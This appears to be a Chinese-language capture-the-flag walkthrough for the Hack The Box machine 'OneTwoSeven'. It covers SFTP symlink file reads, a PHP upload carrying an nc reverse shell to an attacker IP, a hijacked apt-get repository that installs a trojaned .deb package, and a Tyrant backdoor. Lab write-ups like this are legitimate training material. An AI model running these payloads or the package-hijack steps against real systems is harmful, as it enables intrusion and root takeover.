[Meachines] [Hard] OneTwoSeven SFTP-Symlinks+SWP+SSH-forward+apt-get-PE+Tyrant
字数 841 2025-08-29 22:41:38
OneTwoSeven 渗透测试教学文档
信息收集阶段
初始扫描
- 目标IP: 10.10.10.133
- 开放端口:
- TCP 22 (SSH - OpenSSH 9.2p1 Debian 2+deb12u1)
- TCP 80 (HTTP - Apache httpd 2.4.25)
扫描命令
ip='10.10.10.133'; itf='tun0';
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m";
ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//');
if [ -n "$ports" ]; then
echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m";
nmap -Pn -sV -sC -p "$ports" "$ip";
else
echo -e "\e[31m[!] No open ports found on $ip.\e[0m";
fi;
else
echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m";
fi
Web应用分析
发现页面
- http://10.10.10.133/index.php
- http://10.10.10.133/signup.php
SFTP访问与凭证猜测
用户名密码生成机制
- 用户密码是用户IP的MD5哈希前8个字符
- 用户名是MD5哈希后的Base64编码截取
生成本地用户凭证
echo -n "127.0.0.1" | md5sum | cut -c-8 # 密码: f528764d
echo -n "127.0.0.1" | md5sum | base64 | cut -c4-11 # 用户名: ots-yODc2NGQ
SFTP登录
sftp ots-yODc2NGQ@10.10.10.133
密码: f528764d
利用SFTP符号链接漏洞
读取/etc/passwd
sftp> symlink /etc/passwd passwd
curl 'http://onetwoseven.htb/~ots-yODc2NGQ/passwd'
访问根目录
sftp> symlink / root.
访问: http://onetwoseven.htb/~ots-yODc2NGQ/root./
恢复.swp文件
wget http://onetwoseven.htb/~ots-yODc2NGQ/root./var/www/html-admin/.login.php.swp
vim -r .login.php.swp
SSH端口转发
建立SOCKS代理
ssh -N -D 1090 ots-yODc2NGQ@10.10.10.133
OTS Addon Manager漏洞利用
漏洞分析
- 检查URL是否包含/addons/,如果包含则阻止直接访问
- 通过虚拟参数绕过保护机制
利用方法
POST /addon-download.php?a=/addon-upload.php/ HTTP/1.1
Host: 127.0.0.1:60080
[...]
------WebKitFormBoundaryphFWTRQZGfBr7typ
Content-Disposition: form-data; name="addon"; filename="1.php"
Content-Type: application/x-php
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.27 443 >/tmp/f')
------WebKitFormBoundaryphFWTRQZGfBr7typ--
权限提升: APT-get DNS劫持
攻击步骤
- 识别APT源配置:
cat /etc/apt/sources.list.d/onetwoseven.list
- 设置DNS劫持:
echo '10.10.16.27 packages.onetwoseven.htb' >> /etc/hosts
- 设置代理服务器:
pip install --upgrade proxy.py
proxy --hostname 0.0.0.0 --port 10000
- 目标机器配置代理:
export http_proxy=http://10.10.16.27:10000
- 创建恶意deb包:
wget http://ftp.de.debian.org/debian/pool/main/n/netkit-telnet/telnet_0.17-42_amd64.deb
dpkg-deb -R telnet_0.17-42_amd64.deb evil_deb
vim ./evil_deb/DEBIAN/postinst # 添加/tmp/tyrant
dpkg-deb -b ./evil_deb/ telnet_0.17-42_amd64.deb
- 生成Packages文件:
Package: telnet
Version: 0.17-42
[...]
Filename: pool/DEBIAN/main/n/netkit-telnet/telnet_0.17-42_amd64.deb
Size: 71028
MD5sum: 09c8645d8775a4ea3e2e2a9d4cafabdc
SHA256: a93b2287e52518446a4f8097a8a3a605e41a4242a8b9555c08b0d7b4c3f83e73
- 生成Release文件:
Origin: Devuan
Label: Devuan
Suite: stable
Version: 2.0.0
[...]
SHA256:
2c0affea6242c314455189272c7755d261104a66426476e43121433173214516 697 main/binary-amd64/Packages
8fec70cc6b2d80ad6bb874acb975e32134d81614b70080213b6826aaf58789a3 493 main/binary-amd64/Packages.gz
- 目录结构设置:
mkdir -p devuan/dists/ascii/main/binary-amd64/
mkdir -p devuan/pool/DEBIAN/main/n/netkit-telnet/
cp telnet_0.17-42_amd64.deb devuan/pool/DEBIAN/main/n/netkit-telnet/
cp Release devuan/dists/ascii/
cp Packages devuan/dists/ascii/main/binary-amd64/
cp Packages.gz devuan/dists/ascii/main/binary-amd64/
python3 -m http.server 80
- 触发更新和安装:
wget https://github.com/MartinxMax/Tyrant/releases/download/version-2.0/tyrant
sudo /usr/bin/apt-get update
sudo /usr/bin/apt-get upgrade
- 执行Tyrant后门:
./tyrant -uid 0 -rhost 10.10.16.27 -rport 10031
获取的凭证和标志
- 用户标志: a479fec775507b7018411c9dba84a7d6
- 管理员密码哈希: 11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8
- root标志: 7a5b069b4c8ce1ecb5990d58d64939ba
关键安全漏洞总结
- SFTP符号链接漏洞允许读取任意文件
- OTS Addon Manager的虚拟参数绕过漏洞
- APT源配置不当导致的DNS劫持攻击
- 不安全的软件包验证机制
- 通过恶意deb包实现权限提升